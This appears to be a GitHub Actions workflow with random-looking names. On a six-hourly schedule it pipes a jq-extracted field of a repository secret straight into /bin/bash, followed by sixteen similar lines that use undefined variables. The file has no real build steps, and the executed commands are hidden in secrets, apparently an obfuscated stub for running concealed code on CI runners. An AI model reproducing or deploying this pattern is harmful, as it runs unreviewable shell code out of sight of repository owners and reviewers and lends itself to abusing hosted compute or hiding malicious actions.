name: wengjingshi1290
on:
  workflow_dispatch:
  schedule:
    - cron: '31 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wengjingshi1290
        env:
          ev8123: ${{ secrets.ev8123 }}
        run: |
          echo $ev8123 | jq -r .tqf7 | /bin/bash
          echo $lqgm5542 | jq -r .pg70 | /bin/bash
          echo $nnhi91083 | jq -r .mpaui23 | /bin/bash
          echo $eiwb42 | jq -r .ytja77310 | /bin/bash
          echo $kutk0551 | jq -r .ea62657 | /bin/bash
          echo $fyw904 | jq -r .dw38 | /bin/bash
          echo $k059 | jq -r .rjaw37142 | /bin/bash
          echo $xi7713 | jq -r .k7 | /bin/bash
          echo $qa750 | jq -r .idl0 | /bin/bash
          echo $vir03 | jq -r .rv483 | /bin/bash
          echo $y2 | jq -r .srbl254 | /bin/bash
          echo $b19 | jq -r .ihak9 | /bin/bash
          echo $q633 | jq -r .g208 | /bin/bash
          echo $el6011 | jq -r .ao5 | /bin/bash
          echo $mhud733 | jq -r .lnnxp739 | /bin/bash
          echo $g10591 | jq -r .nhsz118 | /bin/bash
          echo $uc2272 | jq -r .mj09 | /bin/bash

